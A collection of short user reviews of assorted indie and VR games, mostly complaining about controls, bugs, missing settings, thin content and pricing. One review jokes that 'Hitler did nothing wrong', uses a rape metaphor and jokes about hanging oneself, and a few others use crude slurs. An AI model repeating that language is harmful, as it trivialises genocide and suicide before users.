Horrible game. Let me tell you why: 1. The controls are terrible. Heck there isn't even a menu where you can see what the heck the controls are. There is also no menu to exit whatever world you just entered. Once you're in, you're in. That's it. I have to exit the entire game if I wanna pick another world. 2. Game says you can play while seated but I have to turn my entire body still if I wanna see all around me. Yes I can move forward, but only forward with the control stick unless I get up and turn around. 3. Again, no instructions. They just drop you in and give you a dash board with a bunch of pictures. Nothing is labled, and you're supposed to just guess what the heck certain things are. There's no organisation to this at all. 4. Actually interracting with anything is next to impossible. I can't seem to pick or select anything unless im pushing the joystick forward and selecting it with the front button. And even then I can only pick what's on the weird dashboard that shows up. 5. Theres' a button for language, great. I was trying to keep it on English when I accidentally pressed some random button and it changed to another language, and there is no way for me to change it back??? What the heck? 6. What even is this character selection thing, it said I could choose my own character/ and even put people in the worlds I make. Okay. I saw  no button for adding people. Oh yeah I also can't even move around in that big room with the giant glass globe (Unles I have to actually get up and move despite the game saying you can play while seated). So I can't read what the heck the signs say above the doors across from me because I can't move. What the heck.7. The world selection menu is terrible, and glitchy, I don't even know if I've actually selected a world until I press a button a thousand times and it finally takes me there. Literally nothing makes sense in this game. Some nice notes: It's a fascinating concept, really. Kind of a sandbox ish playground and stuff. Cool. But it's clearly either not finished/in the beta state or even ALPHA stage/ Or the developers are being lazy. This game needs a TON of polishing, as well as way more labels and instructions and menu options and movement options. Also don't mislead players by saying you can play this seated but still require them to get up and move around if they want to turn. 
1943 Megami Strike is an incredibly poor mobile port. There are no options of any kind. The options menu does not exist. You cannot set your resolution, or the volume, or the controls, or mouse sensitivity, or even run the game fullscreen (save for using Alt + Enter.) There is no controller support, or keyboard support for moving your ship (you must use the mouse.) The interface is an absolute mess. The tutorial doesn't even begin to properly explain how to play the game, much less how to use secondary features like upgrading your cards.The game launches with half a dozen consecutive advertisements for the in-game shop, and every aspect of the game is tied to in-game purchases. If you want to know how bad the in-game purchases are, continues costs 75 cents USD, each. I am not even joking. When was the last time you saw a digital game charge you real money for continues? You could go to a physical arcade and play for cheaper than this game.The graphics are what you would expect from a mobile port. The actual play area is a tiny vertical section of your screen, with the majority of the screen being taken up by pictures of the girls on either side of the play area. The music is dull and repetitive. The controls are mouse to move, Z to use your special ability, X to use bombs (if available.) Number keys choose which ship you are controlling. Your ship fires automatically, which I suppose is actually somewhat useful.This game is nothing but a quick cash grab. In my opinion this game should never even have been released on Steam. Do yourself a favor and stay far, far away from this game.
This game has potential up its sleeve. But it's too soon to really recommend it as I keep finding my self staring at some big gaps. The game feels somewhat empty at this stage and development seems to have stopped since last year. The story and plot line feel non-existent. It's fun until you run out of content. Don't buy it until we hear from the dev again.
Story is fine, but there are some bugs out there that really ruin the overall quality of the game. You cannot kill a rat with an axe whose back is turned to you while stabbing the air, as it deflects the axe (somehow). If you go in front of a rat with a gun, even though its in the middle of its gun cycle, you get instantaneously killed. Lack of explanation for other items (e.g the red bottle) doesn't help players understand the mechanics of the game. Story wise is somewhat hard to understand... Why rats? What is going on with the main character's mind? Overall game experience is average, lots of things could (and should've) been done to help increase the game's quality.
It's Unlike Any Mini-Golf Game You've Ever Played Before... and NOT in a Good Way... AT ALL!Cons♥♥♥♥♥♥-up white borders within holes that your ball MUST LAND INSIDE OF, otherwise you MUST START THE HOLE OVER.Abnormal scoring (par+1, par+2, etc.), mainly due to how EVERY HOLE HAS A PAR OF 1! SERIOUSLY?! FREAKIN' HOLE-IN-ONE ON EVERY ♥♥♥♥♥♥♥♥♥♥ HOLE?! WHO MADE THIS SH!T, ♥♥♥♥♥♥-UP ROBOTS?!Hold RMB and move mouse to move the camera. Just an annoyance for me, but could be frustrating for some.ProsDecent graphics for mid-2015Final Verdict-100/+100: Heed the warnings, black-list the developer and publisher, and move on.
This game is literal cancer. It makes me want to drink bleach. If you want to play cancer then I strongly recommend this game to you, I mean this cancer to you. Hitler did nothing wrong. It rapes my ear with the cancerous music and then makes me want to tie a fat noose and jump.Have a good day :)
ships wont load, an error keeps happening
SO SLOW
Its really hard, and the controls suck. I'm refunding it
You literally don't have to do anything but smashing the space bar in order to getting the achievements...If you already have it somehow ok but don't consider wasting your money on it.Rather donate these 1 or 2€ to charity
How a ♥♥♥♥♥ stupid game!!It's the worst game i played!!!It's not a game we should just call this trash!!!
dont even bother with it.
its not funand it takes multiple shots to tag someone out
Needs more! Give us a big city to cruz in.Became bored in 20 minutes.
This would be a decent game if the graphics wouldn't fail (really bugged, titles overlaying, missing characters) but even then, I'm glad I got this 50% off. Still expensive for what it has to offer. Very little, that is. Dissapointing!
Does falling in slow motion and repeatedly restarting a level over and over sound like fun?No.Ok, then I'd not recommend this.
too little cars and no pick of song
As a real researcher, I think most elements shown in this game is disgusting. If the story told in this game is real, maybe I have quit from my graduate school for a hundred times.
Waste of money. As a big and long time fan of the (unfortunately Windows only) Trials series, i hoped that this could be like Trials Fusion for Linux, but it's not... Bad graphics (i mean really bad, even compared to Trials 2 from 2007) and i could'nt even find out how to make it fullscreen :( - It's like a Trials rippoff where someone removed everything that made it fun, enjoyable and good looking. Overall it feels more like an early access game, but it doesn't say it is one.
TL;DR Could this be good? Yes. Is it good? No. In the 15 minutes I played I soft locked multiple times and started getting motion sick from the camera movement.Positives: Straight forward game play Good looking areas Neat demons with fun backstoriesNegatives: Bugs, I'll put those later to keep this list condensed Information on cards and items is only available from the main menu Information section in main menu is just labelled as ???, making it look like it's locked Font is very hard to read, AR&amp;H all look like the same character Regular grammatical issues The soup (?) being a heal isn't mentioned How card pickups or the deck work is totally unexplained Head movement feels like a drunk toddler No way to turn controller vibration off, even if you're using a keyboardBugs: Errors thrown on the main menu Soft lock from your screen turning grey Soft lock from the demon not picking a card Soft lock from the cards spawning in the wrong place so you can't reach them Starting a game sometimes taking you multiple levels in somehow Stats menu being completely wrong
turbo aids
I bought this game after really enjoying Yak &amp; Co's "Agent A" game.  This game is nowhere near as challenging, or anywhere near as enjoyable.  What puzzles there are, are much easier and for the most part, it's just a case of clicking on a load of stuff.  The whole game can be fully completed in about 3 hours.  The look and feel of the game is great - the world is very charming and it has a good feel to it - but that's about it in terms of positives.  I'd recommend this game for a kid.  As an adult - I'd prefer to just play "Agent A" again.  Overall I'd give this 2/5 stars.
I wanted to like this, cheap easy scares for VR right?Video review below.https://youtu.be/4rjP_wi9i5MThere are 2 'endings' where there are some small changes playing through and the last 30 seconds are different, so playing through it twice takes 8 minutes. Not complaining just stating the amount of content.Not once was I really scared and I believe that was because of two reasons.How random everything felt. "Lets throw in rats, spiders, an axe murder, some monsters, skeletons, a demon and a scifi metal ball!" I get that there are clues that make a story for somethings but it feels chaotic. The animation is awful. Really doesn't help with imursion when there are rats running over me but their legs don't move and they are hovering above my body. I wouldn't be surprised if the assets where purchased because the models are decent.I don't like writing negative reviews but I did watch the credits, don't let me discourage you (devs).Final Rest is cheap and nasty. Bad/10Update:  Dev has changed the games description for the better, states the amount of content and that it's a VR experience.When demoing I still wouldn't waste time showing someone this there are much better VR experiences out there.
wow really bad...
Thought I'd buy this game when I saw how cute it looked on a random deep dive into the store. I regret it pretty instantly, I'm sure the game would be a fun time killer if it didn't cause my mouse to scroll out of the window constantly until i close the game; even when minimized. That could easily be remedied in fullscreen but of course the game has literally no options menu whatsoever so enjoy losing constantly or moving your mouse up and the right constantly. Really didn't think a game as simple as this that only cost me $.59 would disappoint me so immensely but it does. Judging by this companies massive roster of games all released in like the past 2-3 years and almost all mixed reviews I should have know.Avoid.
It's been over 2 years since a new update has came out as of writing this review (July 2016 to be more specific), and it's nowhere near finished. I think you know now not to buy this game. (Final Score: Not getting one.)
Daha iyi olabilirdi
I was hoping for something with actual gameplay, but this is nothing more than Spacebar: The Game. Music is ok, I guess.4/10
AI is just a little too good. Once it scores a hit it instantly knows where your ship is facing. Also it's abandoned. AS a free game yes. As payware no.
Doesn't play like real roulette.  Can only bet squares.  No options for line or corner bets.
Clunky, with no sense of how your choices actually impact the film. The mechanics are shallow with very little in the way of rewards. No look behind the scenes, just looking at numbers.
This belongs on tablet or phone. $9.99 is also a high price to pay for a little Neil Gaiman. Save yourself the $ and wait for it to go on sale or get released on mobile devices.
Saying that I recommend this game is somewhat misleading; I recommend you play it if you happen to pick it up with one of the Indie Bundles out there, but I wouldn't go forking out the money they ask for this otherwise. Worth £5 this is not. Very pretty game, yes. Has some potential in the realm of puzzlers, but the solutions to a couple of them are annoyingly obscure, to the point where it's out of sheer luck you figure them out. Game lasts up to an hour, but most of that is down to slow walking speed of the main character and going back and forth trying to work out what on earth you missed.The single-track soundtrack starts to get tiresome after a while, nice as it is.
Here is an Uneducated Review of the game:https://www.youtube.com/watch?v=ngREqCBW-_Q
Maybe I don't get this game, but neither does my friend. I'm dying even though my stats are good... Seems very early, might be a decent game with a ton of polishing. They need to get rid of the mouse wheel selection and go to a normal drop down mouse style. I guess it's a alright game for under 4 dollars, but it really needs some better interaction and content. The swimming system is also absolutely stupid. I should say mash a bunch of keys over and over if you walk into the water..
I'm not really exited by this game and i will tell why,But first let me tell what i do love. Really like the style of the game and the different towers.But then there are only four levels. And there are no goals, no story, nothing to achieve exept for youre level.When you play a lot of TD games you will see that you will play these levels easy to wave 50, and then its suddenly game over because there are no more waves.After completing these levels you will have a lot of money that you cant use because you all ready bought all the towers.For me this feels like a free demo, not a €5,- game wich also provide mico transactions.Maybe when there will be a update with a lot of new levels and also some goals to achieve than i would give it a new try. but for now after less then 4 hours of playing and completing everything its not worth more of my time
This game was incredible boring without any challenge or pressure at all - even toddlers would get bored. It feels like playing a point and click game without use of brain. There is a timer in the game, however the timer never get anywhere near running out. The music is awful, the sfx ok, the gfx fine, encountered a few bugs. All in all, not worth money.
The base concept around Deliverance is promising but fails in the end.  What starts off as intially fun soon takes a turn for the worse with the constant restarting, recollecting and rethinking of your current strategy (the constant reviewing of the rubbery hands is enough to cause borderline paranoia in itself).  The map itself is vague and difficult to understand even though it says "Cell" on it (where you start off).  Batteries are one of the most important items needed in the game but at times seem to be far and few apart (one time I opened the lockers at the beginning near the cell and it rendered not even a single battery!) Bursting lightbulbs and pipes add a good touch to the psychological experience and jump scares (even after almost 9 hours of gameplay it still causes this scenario with me).  The concept of having stamina attached to sprinting was not well thought up as this is the only means to escape walter (which I did once by dumb luck!)  A few things that could've fixed this game a bit is the following:1. Allow the players to save the game 1 time anywhere (then after this if they die make them start over completely).2. Allow for the use of environmental aspects (objects or items which could slow walter down)3. Dont make gamers sit through that extended scene at the end (where you're strapped in the chair waiting for him to kill you off as sometime it takes more than 10-15 seconds for him to show up). I found this to be constantly annoying and I could've already been making my way back through the game.  In the end, my verdict 3/10 at best
The game has potential. It currently lacks settings and good english.
The worst of its series. lack of variety.  it might promote white supremacist because only applied same color to every character's skin. pro: easy achievement + cheap
badly designed! no point buying! free version is alot better!!!
I really wanted to like this game. It's silly, it has a Tommy Wiseau pigeon, and it costs $1. But some things are just broken.The entire game consists of flying left or right and pressing space to poop on things. Sometimes the things move, and sometimes there is wind, so your poop moves. The dialogue between levels is in broken English that is usually understandable if you take an extra second or two. All of that is fine. It's funny, simple, and endearing.The problem is the one difficulty mechanic (admittedly I didn't get very far) is wind. Wind makes your poop move, and wind changes direction, except it doesn't. Currently there's a wind indicator that shows you whether wind is blowing left or right. Wind always blows right, even if the indicator says it's blowing left.Also apparently it's just a browser game, because every time I hit F12 to take a screenshot (the default keybind in Steam) a Chrome debugger window pops up over the game.On one hand it's $1 and it's entertaining enough that I kind of don't care. On the other hand I just paid $1 for a browser game with one mechanic that doesn't even work.
It is really hard for me to decide if i recommend this game or not. Thing is...the writing is nice. The rather light, humorous (sometimes ridiculous) style makes for an easy read. And, for most parts, a very fun, enjoyable read. The problem, though, is the total lack of meaningful player decisions. I played through this 2 times, because i had 2 different "routes" i thought i could try (in regards to who to romance/marry in the end) but it turned out there was little to no difference in those playthroughs. Furthermore i spent literally 6 hours or more trying to find out how to break a certain curse placed on one of the romance interests. I failed, not sure if there is a way, honestly, the game seems to imply it, but whatever it is as far as i can tell you're never told. I even went so far as to try and fiddle with the gamestate file (which heavily implies that the curse can be broken), but even that didn't lead to a different ending scene. (I don't want to go into the details so i don't spoiler it for anyone) Why do I include this in my review? Well, there is a certain vibe of "unfinished" to the later stages of the game and i, by now, am under the impression that might be the explanation why even changing the gamestate itself (and i have a lot of routine with that, i live under the impression that i understand the way Choice of... Games work well enough to identify the triggers for certain events by going through the files), though there is ofc the chance i failed nevertheless. So do i recommend such a short CYOA that feels as if it was left unfinished, has a lot of very underdeveloped (but promising, which makes it kinda worse, even), likeable characters, a plot that partially is pretty decent and partially rather...weird? I might. But I feel as if, despite wishing for the author to continue creating games or maybe even make a sufficient patch for this game, adding some content (or, heck, possibly even a 2nd part to this that is a little more matured structure wise (I'd buy it, despite my final verdict for this 1st one)), I can not recommend a Choose your OWN Adventure game that has potentially 0(!!!) actual player decisions, besides an out-of-nowhere moment right at the end where you can achieve somewhat varying endings? I don't think so, and that feels a little sad. :/
Interesting game, enjoyed the concepts and was looking forward to a great management/adventure experience. Falls a little flat in terms of mechanics, a little too simple to just add or upgrade units when you see one battle, and you've seen them all. I think the fact that the map and encounters aren't procedurally generated is a big sticking point. I expected to see something different every run, and the "choosable" paths that are the same every time make for a lackluster experience when coupled with the mediocre combat.Decent game, would be a great game if more depth and polish was given to combat as a whole, and the nature/implementation of the overworld map. If more work is done into elements such as these, and it becomes a more robust gaming experience, absolutely worth $5.
This game looked good for my kids aged 3-6, but you need good reading skills to play (practically no other way to work out how to play or what things mean), which rules out the younger kids, and it isn't that easy to follow what's going on. I would say it might be good for kids around age 8+It is not good for younger kids than that.
Basically no content exists in the game, just basic mechanics, and it saw one or two updates since release for what was meant to be "only a few months" in early access. ♥♥♥♥ show.
I loved Chime from Zoe mode (OneBigGame Publisher). Spent hours with it, despite its small music library. Somehow it was weirdly satisfying to watch a block go “puff” to complete an enjoyable soundtrack. It put me into the flow with the music. Also the “still alive” soundtrack from portal was amazing. You’re looking for a good music game, go by Chime……skip on Chime Sharp though. The biggest issue is the music selection. There is no workshop resp. no possibility to add own soundtracks (although that is probably due to copyright laws). However they got… well how do I put it… I want to rip my ears off on some tracks. There are certainly people liking it, but I strongly recommend to first check the play list. I should have and you can do it here. http://steamcommunity.com/app/326520/discussions/0/359543951714333829/Now some minor flaws.- 3D is not necessary and in my case I don’t like it. The slight tilt of the grid upwards makes the block placing a bit wonky. That is a huge issue in a speed game. Switched to keyboard, but placing is only possible with the mouse and key-binding can’t be configured (or at least I didn’t find this feature). For me important because using a CH keyboard the Y and Z key are across the Atlantic from the X for my small hands.- Also please remove the track unlock. It is ok to have challenges, but I want to play the tracks I like and not force myself through some ugly chaotic assemblies of noises.- What’s that google analytics part? It states in the configuration “Opt Out of Google Analytics” with the drop down option “In” and “Out”. Now wait!!??? Do I select In to Opt In for the Opt Out or Out to reconfirm the Opt Out? Wahhh??? Language ambiguity. I’m not native English, but I’m pretty sure I’m not the only one left confused.Overall not enjoyable. I could only take halve an hour of it. I might reconsider buying it after some major updates, but until then I unfortunately can’t recommend it.
Definitely not recommended. Animations/transitions take way too long and are unskippable, and you can't do anything until they're done. Plus, you keep having to go back over the same sections repeatedly because what you need to complete a section doesn't become available until you click where you need to use it, and then you have to go back all through again to find what's needed.
Cool concept, but not very good overall.Recommend learning Blender instead, its free
If you don't know anything about old TV I would not reccomend this game.
As it is it becomes quite repetive and boring. The game seriously need something to spice it up a bit. I would sugest a bigger field, more robots and teaching AI to recieve a pass as a starting point...I'll try it again in some time to see if something has been done to make it more interesting. But till then its a no from me.
Pretty much the worst boss design I've seen in an RPGmaker game.  They're not even hard, just too damn time consuming.I don't think I articulated well enough there.  When I say time consuming, I mean it took me over a half an hour to beat the final boss.  It's not like I had a hard time with him, what with barely getting attacks in and having to constantly heal and revive my team.  It was a half an hour of just  mashing attack and occasionally using a group heal.  I doubt it this was playtested.
you can't make anything on your own you can only recolor the pre-made ones and even then it won't let you chose new colors
So basic that lacks english interface.
Back when I bought it I had so much fun with it, but now it will not start. That's the real reason I hate this game and will not recommend it. It will not start.
IDIOT WHO MADE THIS GAME!!! STUCK AT LVL 58 &amp; 72!!!BUAT GAME GA NIAT ANJING BGST!!!!!
The game has been abandoned for 2 years so far. Do not give these devs your money.
The game itself is great, but It is unclear how much longer it will be supported. Several achievements are broken, newer emojis don't work, and the website doesn't have an SSL certificate.
This game crashes a lot for me, and I'm not sure why.Putting that aside, this game although very atmospheric, I do not find it that pleasant.The controls were very off-putting for me, though I did find Alt Controls in the options which made it better for me. The obstacles seem extremely difficult. I know it is supposed ot be a challenge, but if feels like its a last decision "make or break" everywhere I go. Sometimes, I just randomly stop moving, which Im sure is the game trying to turn around, but its so weird compared to the acceleration the ball starts at. Also for some reason, if you play a level again and don't get the star/time bonus, it just takes it away from you if you previously had it.It's an alright game, but it feels too much like a bad browser flash game. I wouldn't pick this up unless you are looking for something new, or if it goes on sale.
I would not recommend this game. I like mindless shooters, but this one takes it a bit too far. The tutorial is nice and simple, sure, but it's nothing like the rest of the game. Even on the first level, I found myself wondering what the heck killed me, leaving me unable to form any kind of strategy as to how to better manage my time with each target. A lot of the targets have fancy visuals with them, and sometimes it means something and seems to kill you, and sometimes it doesn't. It seems very inconsistent and dependent on the target. Another complaint I would have is that the time you need to spend to get a power up seems very arbitrary, with only the score counter and the level's progress bar to tell you how long it's been since you started the level. However, since there's so much stuff on screen at any given time (and said stuff requires quite a bit of fire to take down) that you really can't take your eyes off the playing field for a moment.Lastly there's the UI and controls. The inclusion of a big clickable pause button makes me think of a mobile game, but the game seems more suited to being played with a controller, so the button taking up unnecessary screen real estate seems completely unneccessary. The controls themselves could use some tweaking. Most people are probably playing with an Xbox or PS3/4 controller, and the need to keep the left/right bunper squeezed to fire and then the triggers being used to toggle weapons is really weird. It would be much better if there was an option in the menus to turn on an "always fire" option (or inverse fire a la bullet hell games) but no such luck.Overall, this game could be much better, but as it is? Avoid.
I'm a massive sci fi nerd and a pervert so this was purchased as a Christmas gift for me.I wanted to like Stargazers, I really did. The premise is neat sounding - it's supposed to be a self contained story in a retro-kitsch future with a pulp feel to it. Front and center is the relationship between two human women and a female-gendered biometallic polyamorous space elf. Intriguingly the story allows you to switch perspectives at certain points. Ideally this adds replayability to the game, as well as giving some flexibility to how the story gets told.Unfortunately the game falls short on several levels.On a technical level the game, though it has no crash issues, has several problems that should have been fixed at the time of this review. The game came out on the 4th of November, 2016. As I write this it is the 6th of February, 2017. At a certain point in the game assets the game tried to load simply weren't found, and the game continued for a while with an error message in the corner. At another point the game seemed to simply not load any character images for what seemed to be a perfectly normal sequence, leaving nothing but the background. While the game eventually 'popped' back to normal, I was completely unsure if what had just happened was a technical error or simply an unfinished scene.There are also grammar and spelling errors at a frequency which is disappointing considering reading text is what you do all game, including spelling the name of the ship incorrectly. I can understand errors like these happening and the aforementioned technical problems existing during the initial launch, but they should have been patched by now. Out of curiousity I clicked the help button to see what it was and it opened a text file with an email address. Okay.The perspective mechanic works correctly; however I found myself sticking mostly with one character, with a few scattered switch-ups. Unfortunately this ended up limiting perspective, as what seemed to be major, exciting events happened entirely off-screen because I had selected the wrong person. While this might have been ok (sometimes it pays to be alone with a character and their thoughts), it becomes clear that the character is usually informed of major parts of what happened without the player necessarily finding out, making random references utterly meaningless if I hadn't selected a certain perspective.And now that I've dealt with the mechanics, I can really get into the story. The most glaring problem is that the game ends after interesting things have finally begun to happen, both in terms of world-building and relationship progression. The game ends up feeling like playing through the first act of story, except that random paragraphs on each page disappear and reappear because of the perspective mechanic. And then it ends.I'm concerned that what happened was an attempt to feel very 'pulpy' without consideration for how well done pulp (or more recent pulp inspired media) plays out. For a modern example, Pulp Fiction has many stand-alone stories that intertwine and weave through perspectives, but the story comes full circle due to the non-linear narrative, filling itself in. The sort of fulfillment of a stand alone didn't happen and I'm unsure how much different perspectives can consistently offer. The other, somewhat less recent example would be Star Trek - The Original Series, and the game does have a certain pseudo-episodic feel to it over a somewhat vague amount of time. The problem here is that TOS episodes were still full stories in and off themselves, and also had a lack of actual major character development as a feature - TOS characters were archetypal. Stargazers characters are not, unless they are secondary, which means no matter what I always felt like I was missing out on important events or inner monologues, and actually did aside from brief references. The game would have been better served with a more traditional structure that allowed focus. Imagine if you cut a TOS episode down to scenes that exclusively featured a selected character. Gonna make for some really lopsided and weirdly paced episodes.The 'romantic' plot also seems much too easily 'solved' and devoid of any kind of heat. Should the threat of a love triangle be boring even if constrained to one perspective?"So replay the game" you might say. Unfortunately I can't say I feel like it. My playtime is inflated because I privately streamed it to a handful of friends and insisted on voice acting every role (in part because of an uncomfortable lack of music and sound effects), but even if it had taken less time, there's just not enough interesting going on. There is the hint of interesting things developing, both in terms of the setting and in terms of the relationships the game is supposed to be about, and I mean that in totality - whether you wanted the story to feel like a somewhat real presentation of a relationship or something really gratuitous and deliciously sleazy and thrilling, you won't find it here. The game ends before it's even finished getting to first base with you.Some might chalk this up to censoring, but I have to question that since there's ample opportunity to raise heat and stakes without being too over the top. In the steam version, the developers removed the bulk of the 'cg' pictures and the scenes where they would come into play are simply skipped over or worse - the player is faced with a black screen and the text to read. From what was linked to me, some of the cg is pretty tame regardless (though some isn't, though it's nothing too wild still) and already exceeded by all kinds of non-romance games. The developers stated on the forum that there's no patch to "uncensor" the steam version to avoid competing with the site where they do sell the uncensored version. I don't know the fine details of such a choice were so I won't guess.However this presents a major problem in that sex and sexuality is a major part of both relationships and personality, particularly given the thrust of the story and the 'resolution'. Either there was no character development made through any kind of deleted content, which utterly squanders many opportunities, or there was character development which was removed. What's left is clumsy and unconvincing of libido or romance.As for the art while I didn't find it horrible I wasn't sold on mecha design and the character art felt unevenly done.It's a shame. There's bits of neat stuff seen through the cramped windows, but the shuttle ride is over before it hits escape velocity.
The game's idea is great, but the implemetation is quite bad and feels too unfinished. There should be at least some checkpoint system (and im sure everyone is telling that), but i also think that leaving this game at simply just a puzzle is a bit boring. The game feels empty, no dialog, no real story, feels like there should be some sort of tutorial system as well. Overall the game is good but very unfinished from my point of view.
The game relies HEAVILY on coins to purchase more resources to get through the puzzlesDeveloper forgot to include the microtransaction server where coins were most-likely meant to be purchased with real cashYet another non-functional $teamy one - this site has turned into the interweb's Wal-Mart toilet and no one's even bothering to come back to flush
This is, by far, one of the worst games I've ever tried to play.
This is a very narrow recommendation. This also contains spoilers. A few direct ones, others less so. If I could give it stars, it would be a 2.51/5. This is a story with a lot to say and for the most part it says it very well. It is concise, without overstaying on any one point or topic. It actually focuses so much on being direct and straightforward that sometimes you might wish it actually spent more time on certain topics. However, despite interesting and diverse characters, relevant, important and simply good topics and overall great quality in story telling, it is severely let down by a lack of main character agency, garish and caricature-styled art, and its price.The good is that, as I said, it tells its story very well and very concisely. There is no lack of understanding of where your character is, what you're doing and why you're doing it. It doesn't muddle its content and its characters are presented in a unique way to complement their uniqueness. Each one is diverse and for the most part present, none of them losing their grounding. Even the most over the top character (Bryce) manages to come off as a real person going through some very real issues. The decision system is made very well and has a good impact on the story. Coming from a history buff and someone who enjoys watching and reading about various historical battles and moments, the battles felt simple but good. There were no crazy decisions leading to a crazy victory but actual logical choices that made sense in the context of their situations. There are a few stretches here and there but the world does just enough of a good job to make them believable. The main character is a very interesting character to me. It is a character I have had no experience with playing or reading about and brought some very interesting points and moments and their inner monologue does a very good job of showing their struggle and insecurity without going overlong or getting repetitive. I never felt like I just wanted to click through to skip the conversation. The relationships with the other characters also develop in a good way, obviously putting more emphasis on the ones you choose to interact with or even romance and, at least for the romance I picked, I felt like their connection was real if a little rushed. Then again, making it through a harrowing campaign to come out the other side of the meatgrinder might have that effect.There are bugs however, or I hope they are bugs because at least they would be excusable. There are moments and certain lines that appear that don't have any connection to the actions you have taken and the current event, almost acting as if you made a different decision. There are also more than a few misspellings or just very cumbersome word choices that stand out.The story is short. Far too short. Especially given the price point. It took me 6.6 hours to do my first play-through with only a minor amount of replaying because I died the first time. It spends next to no time with its set up, instead preferring to reveal most of the background over the duration of the game. That is fine in this case because it's done fairly organically. You get the important information and some side information for good flavor as it is relevant. The problem comes with most, if not all of the setting of the game, being very poorly and inadequately explained. You are a citizen of an allied kingdom, currently fighting for a different king because of an old tradition of allowing your people to learn and train with your allies for everyone's benefit, but the current king is using your people for unjust and fake wars. The current king has also usurped his crown from the previous king who may have been a tyrant but the current king may also be a tyrant and his son may also be a psycopath. The problem with the setting alone is that it is simply just speculation, and this is the directly relevant setting. Things are very poorly explained, especially to or by a character that is supposed to be well aware of these things. To a degree you are supposed to make your own inferences but it's all so muddled that it feels more like trying to guess the color on a piece of paper in an almost pitch black room.While we're on the story, there are many many other issues. There is magic in this game and the game never bothers to explain who its main users are, what kind of training they go through or what its impact on the world is. There is a semi-modern level of technology too (at least by historical standards. I would say a mixture of 1400s and 1900s technology) where you have fairly modern looking troops and fairly lightly armored troops fighting in a medieval style. Gunpowder exists and exploding or shrapnel mines exist but no cannons or guns. There are constructions that hint to a bigger, more advanced world but the game doesn't even bother to gloss over that and promptly blows it up. It doesn't feel grounded in any way. Where the characters are present and real the setting is a mixture of a 6 year old-fantasies and equally well explained. There are many many many such cases. What are the clerics? Why are they clerics? What are the gods, how many are there, why is the important god important? Why do we meet her if we die? Why is she seemingly important but then we get to meet her? And so on.There are also multiple story ideas and threads that the game very boldly pulls up and then immediately drops completely unresolved. No explanation about a major magical ability of the archamges that can literally drain soul essence, or how the clearly possesed crown even came to be or what is happening to it, or how you, the person who spent the entire time proving to yourself that you can lead, actually tried to rule. The game makes you a queen and voila. Happily ever after (in my run) and end of story. The game also brings up current topics like gender identity but brushes it off as "it's all I ever knew so I'm comfortable". That is literally the opposite of gender identity understanding. I love that it made me think about these things but I hate how it went on about it.And finally, the game is $20 too expensive. The art style is bad. Very bad. The non-CG character screens are better quality than the CGs and they are caricatures to the point of being off-putting. If this ever goes on at least 80% sale, it would be worth it. The story is ridiculously short though I understand that there are choices. The problem is, one playthrough was enough to have enough. Ultimately this game is severely let down by a lack of grounding. The characters are good, the story brings very interesting moments and points to the table and it leaves them there to go instead and make fridge drawings.
What the heck is this? No, seriously. It tries to be a Mario/Sonic/Late 90's pick-up-a-thons with ♥♥♥♥♥♥♥♥ platforming mechanics and even ♥♥♥♥♥♥♥♥ level design. Not to mention the achievements are...the same? Same name, same icon...but one is unlockable fairly easily but the other is a hidden achievement. What? So for the 5 mins or so I played it, I suppose you're supposed to control this...thing, which looks like a flask or something, and collect thingies around the map. These give you points. Oh, and you can open up a spawn menu and spawn a whole bunch of ♥♥♥♥ to supposedly help you around the level. Feels like an assignment for a game development student due to be passed up next week and done the week before. Something that I would so totally do, if I were one. Get it for the stickers and achievement I guess. Or to clog up your library with cheap games.
First I thought this is a no brainer for 20 bucks.But nowadays releasing a VR game withoung VR controller support and no graphics options at all is just a no go.Graphics are too blurry at all.And why does the game start Oculus?I got to change the screen back into the game to have audio.Sorry, but I'm refunding this.
When I launch the game the screen is black, I know that it is running as I can here it, if i press space it seems to start, but I cannot see it at all. It probably needs a windowed mode from what I can tell, and the ability to press a button, F for instance or Alt and Enter, so that you can switch between windowed and fulscreen
This game wasnt what I expected. It is simply a search and find game with a overlaying story. Overall the story wasn't very great but the search and find was fun.
Bought this game back when it was called CrazyCcar for my son, now its completely different and not something I would buy
The game is good, under normal conditions I would actually recommend it, however there are many game breaking issues so I can't recommend it at all.As a single player game, this game REQUIRES server connection all the time. Sure, if the server weren't in China, this wouldn't be an issue. 9 out 10 times when I try to open this game, it literally won't let me enter the freaking game cuz this server issue. And if you are so lucky that you did enter the game, and manages to play it, and also like me, trying to play it at one go so don't need to face the connection issue again, here is another thing: achievements unlocking also requires server connection. So like me, who actually completed the game, my achievements only shows I completed half of the game, because for the other half, I wasn't connected to the f****ing server. Seriously??? Which genius came up with the idea to have a single player visual novel connected to a server to play?Now even ignoring the ridiculous server issue, don't expect this game to be a detective murder solving game. This is a visual novel, period. What you do is literally clicking to proceed the story, the mini games or deduction is waaay to simple almost requires no brain. Even if you can't solve it, it literally gives you four choices and you can just click four times at most to figure out the correct answer. Now as a visual novel, I would actually recommend it, cuz it looks great, with awesome character drawings and it has voice acting the entire game which I find rare. If you can overlook the whole server thing.
I only played single player mode. It's not so attractive for me.The game graphic could be better,but now it just like a students topics.Maybe we can play this game when it had a higher degree of completion.
This game is very fun however, I would not recomend you buy this until the bugs are fixed.PROS: The art is well done; the gameplay is simple to understand; the music is hella immersive; simple user interface; only $3CONS: The game crashes about every fifteen minutes; there is no auto-save feature as far as I am aware; there are no tutorialsFINAL VERDICT: I would not recomend this game unless until there has been updates to fix the crashing.
boring
HAY! Are your a YouTuber or Streamer? Then this is the Game for YOU!Yell and Scream to your heart's content! Fight ♥♥♥♥♥ ''Physics'' feel like your paying golf it and bubble witch at the same time, But! With a beach ball that stops be for it should!LOOK at all the ACHIEVEMENTS! What are they for? WHO CARES! You got them. WOW!BUT WAIT! If you BEY NOW we'll cut out half the FUN! WOW!CONTENT FOR YOU!
The art style and story are very cute and I had hopes for a good pinball game. Unfortunately the flippers are very weak and the physics for the game are not very accurate. It also has some flying sections that you are expected to complete using pinball controls. I did like some of the special levels like the Pachinko level, but overall the pinball aspect of the game lets down the overall experience.
This was a very nice game. The "battle" (aka discourse) system was innovative and it was really cool in the beginning. After farming for exp (for bows) for a while, it got really boring. I had to replay the game several times because I kept missing special events and I was going for 100% completion. It was such a pain to go through all the discourses again in order to get exp all over again. The story was okay but sometimes it felt like it was too much talk over nothing really.I really enjoyed collecting wine labels and learning about the different kinds of melon wines, tho~I liked it but I'm not really sure I'd recommend it.
Good premise poor execution, the idea of the game is good but so far most of the levels have been rather dull add to that the rather crappy controls meaning you'll end up dying way more to bad controls then to any actual threats in the game.Also despite recognising my controller i couldnt actually use it as it didn't respond to any input made using my controller despite showing it actively was recognising it.
